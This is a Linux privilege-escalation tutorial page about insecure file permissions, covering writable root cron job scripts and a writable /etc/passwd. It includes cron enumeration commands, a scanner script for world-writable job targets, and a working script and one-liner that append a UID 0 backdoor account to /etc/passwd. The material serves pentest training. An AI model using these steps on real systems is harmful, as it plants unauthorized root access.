Insecure File Permissions

Last updated 1 year ago

In this attack method, we look for a file that lower-privileged users (or "others") can write to, but which is executed, read or otherwise trusted by a process running with higher privileges, typically root. Writing to that file lets us run our own code, or plant our own data, in the privileged context. The two classic cases are scripts launched by root's cron jobs and the /etc/passwd file itself.

Crontab

cron, the job scheduler on Linux, is a prime target: system-level scheduled jobs are executed with root privileges, so a job script that a normal user can overwrite is a direct path to a root shell. System administrators also make the mistake of creating cron jobs whose scripts, or the directories holding them, have insecure permissions.

We can look for cron jobs in two different ways: by inspecting the installed cron configuration on the filesystem, and by reading the cron log, which records which jobs actually ran and as which user. The system-wide table is /etc/crontab; jobs can also live in /etc/cron.d/, in the /etc/cron.hourly, cron.daily, cron.weekly and cron.monthly directories, and in per-user tables under /var/spool/cron/ (root-only by default). The following commands cover the main table and the log,

cat /etc/crontab
grep "CRON" /var/log/cron.log

Note that /var/log/cron.log only exists where syslog has been configured to write cron messages to it; on Debian and Ubuntu the default destination is /var/log/syslog, and on either system the log is typically readable only by root or the adm group. Reading the log from a low-privileged shell will usually fail, so the filesystem is the reliable source.

There are times when not all cron jobs get listed (I am still trying to figure out why). In the meantime I came across this script, created by Benjamin W of Stack Overflow, which lists all cron jobs of all users. Here's the link to the script, which I have added to my GitHub account: vapt/completecrontac.sh at main · SisyphusP42/vapt (GitHub)
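As an added example that is not code from the original page or from the script linked above, the following shell script parses crontab-format files (handling both the system layout with a user field and the per-user layout, comments, environment lines and @reboot-style schedules) and reports job targets that are world-writable or sit in a world-writable directory. The scan_system_cron function walks the standard Debian/Ubuntu locations; those paths and the helper names are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): enumerate cron job definitions
# and flag job scripts, or their parent directories, that other users can
# write to. File locations follow the Debian/Ubuntu layout; adjust as needed.

# Print the command path of every job in a crontab-format file.
# $2 = 1 for the system format (/etc/crontab, /etc/cron.d/*), which carries a
# user field after the schedule; 0 for per-user tables (/var/spool/cron/...).
cron_targets() {
    file="$1"; has_user="${2:-1}"
    while IFS= read -r line || [ -n "$line" ]; do
        set -f; set -- $line; set +f      # split on whitespace without globbing '*'
        [ $# -gt 0 ] || continue          # blank line
        case "$1" in
            '#'*) continue ;;             # comment
            *=*)  continue ;;             # SHELL=, PATH=, MAILTO= environment lines
            '@'*) [ $# -ge 2 ] || continue; shift 1 ;;   # @reboot, @daily, ...
            *)    [ $# -ge 6 ] || continue; shift 5 ;;   # min hour dom mon dow
        esac
        if [ "$has_user" = 1 ]; then
            [ $# -ge 2 ] || continue; shift 1
        fi
        printf '%s\n' "$1"
    done < "$file"
    return 0
}

# True when the "others" write bit is set (9th column of ls -l output).
is_world_writable() {
    [ -e "$1" ] || return 1
    case "$(ls -ld -- "$1")" in
        ????????w*) return 0 ;;
    esac
    return 1
}

# Print each absolute job target in $1 that is world-writable, or whose parent
# directory is (a writable directory lets us replace the script outright).
writable_cron_targets() {
    cron_targets "$1" "${2:-1}" | while IFS= read -r t; do
        case "$t" in /*) ;; *) continue ;; esac
        if is_world_writable "$t"; then
            printf '%s\n' "$t"
        elif is_world_writable "$(dirname -- "$t")"; then
            printf '%s (parent dir)\n' "$t"
        fi
    done
    return 0
}

# Walk the usual locations. Per-user tables are root-only by default, so an
# unreadable file there is expected from a low-privileged shell.
scan_system_cron() {
    for f in /etc/crontab /etc/cron.d/*; do
        [ -f "$f" ] && [ -r "$f" ] && writable_cron_targets "$f" 1
    done
    for f in /var/spool/cron/crontabs/* /var/spool/cron/*; do
        [ -f "$f" ] && [ -r "$f" ] && writable_cron_targets "$f" 0
    done
    # run-parts directories: any world-writable script in here runs as root
    find /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly \
         -maxdepth 1 -type f -perm -002 2>/dev/null || true
    return 0
}

# Usage on a target: sh cronscan.sh scan
if [ "${1:-}" = scan ]; then scan_system_cron; fi
```

Only the permission bits are checked, not `-w`, so the result is the same whether you run it as root during a rehearsal or as the low-privileged user on the target; a group-writable script owned by a group you belong to would still need a manual look.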

Passwd File

The passwd file under /etc lists the local user accounts, one per line, with seven colon-separated fields: username, password field, UID, GID, GECOS (description), home directory and login shell. Historically the second field held the password hash itself; on modern systems it holds the placeholder x and the real hash lives in /etc/shadow, which only root can read. The old behaviour is still honoured: when a user authenticates, pam_unix reads the passwd entry first and only consults /etc/shadow when the password field is the x placeholder. A real hash placed directly in /etc/passwd is therefore used as-is.

If we have write access to this file (check with ls -l /etc/passwd; the correct permissions are -rw-r--r-- root root), we can append a new account with a password hash of our own choosing and UID 0. Duplicate UIDs are allowed, so the new account is root under another name, and we can switch to it with su.

The hash for the password can be generated with OpenSSL,

openssl passwd <password>

Without an algorithm flag, OpenSSL 1.x produces a legacy DES crypt hash (13 characters, as in the example below; the password is silently truncated to 8 characters). OpenSSL 3.x dropped DES and defaults to the MD5-based $1$ format. Prefer the -6 flag (SHA-512 crypt, $6$..., OpenSSL 1.1.1 and later), which every current libcrypt accepts, whereas some distributions may build libcrypt without DES support. Note that $1$ and $6$ hashes contain $ characters, so wrap them in single quotes when echoing them into the file, or the shell will expand them and write a broken entry.

Then, using the output of the previous command, a new user equivalent to root (UID 0, GID 0) can be appended to the passwd file,

echo "root2:BK24fhifieu3I:0:0:root:/root:/bin/bash" >> /etc/passwd

Afterwards su root2 with the chosen password gives a root shell; id should report uid=0(root), since the UID resolves to the first matching entry.
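As an added example that is not part of the original page, the helpers below generate a modern hash, compose the seven-field entry, validate it before it touches the real file (a malformed line can lock everyone out), and confirm the new name resolves to UID 0. The account name root2, the password and the optional file argument are placeholders; the hash comes from openssl passwd -6, falling back to -1 on older OpenSSL builds.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): build, validate and append a
# UID 0 entry for a writable /etc/passwd. The account name and password are
# placeholders; pass a different file as $3 to rehearse on a copy first.

# Generate a crypt(3) hash for $1 via stdin (keeps it out of the process list).
# SHA-512 ($6$) needs OpenSSL 1.1.1 or later; fall back to MD5 ($1$) on older
# builds. Both avoid the 8-character truncation of the legacy DES format.
gen_hash() {
    printf '%s\n' "$1" | openssl passwd -6 -stdin 2>/dev/null \
        || printf '%s\n' "$1" | openssl passwd -1 -stdin
}

# Compose the 7-field entry: name:hash:UID:GID:GECOS:home:shell.
# UID 0 / GID 0 make the account root-equivalent whatever its name;
# the passwd format allows duplicate UIDs.
make_passwd_line() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# Check a line before it reaches the real file: a malformed entry can break
# logins for everyone, and a hash with its '$' signs eaten by double quotes
# is the usual cause.
validate_passwd_line() {
    line="$1"
    nf=$(printf '%s\n' "$line" | awk -F: '{print NF}')
    [ "$nf" -eq 7 ] || return 1
    name=${line%%:*}; rest=${line#*:}; hash=${rest%%:*}
    [ -n "$name" ] && [ -n "$hash" ] && [ "$hash" != x ] || return 1
    case "$hash" in
        '$'*'$'*) ;;                               # modular crypt: $1$, $5$, $6$, $y$ ...
        *) [ ${#hash} -eq 13 ] || return 1 ;;      # legacy DES crypt
    esac
    uid=$(printf '%s\n' "$line" | cut -d: -f3)
    [ "$uid" -eq 0 ]
}

# Append the entry to $3 (default /etc/passwd) only if the file is writable,
# then re-read it to confirm the name now maps to UID 0.
add_root_account() {
    name="$1"; password="$2"; file="${3:-/etc/passwd}"
    [ -w "$file" ] || { echo "$file is not writable" >&2; return 1; }
    line=$(make_passwd_line "$name" "$(gen_hash "$password")")
    validate_passwd_line "$line" || { echo "refusing to write malformed entry" >&2; return 1; }
    printf '%s\n' "$line" >> "$file"     # printf with a variable: no '$' expansion
    awk -F: -v u="$name" '$1 == u && $3 == 0 { found = 1 } END { exit !found }' "$file"
}

# Usage on a target, then: su root2 ; id   (expect uid=0(root))
# add_root_account root2 'Str0ngPass!'
```

Rehearse against a copy first (add_root_account root2 'pass' /tmp/passwd.copy) so a quoting mistake is caught by validate_passwd_line rather than by a broken login.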
๐Ÿง
vapt/completecrontac.sh at main ยท SisyphusP42/vaptGitHub
Logo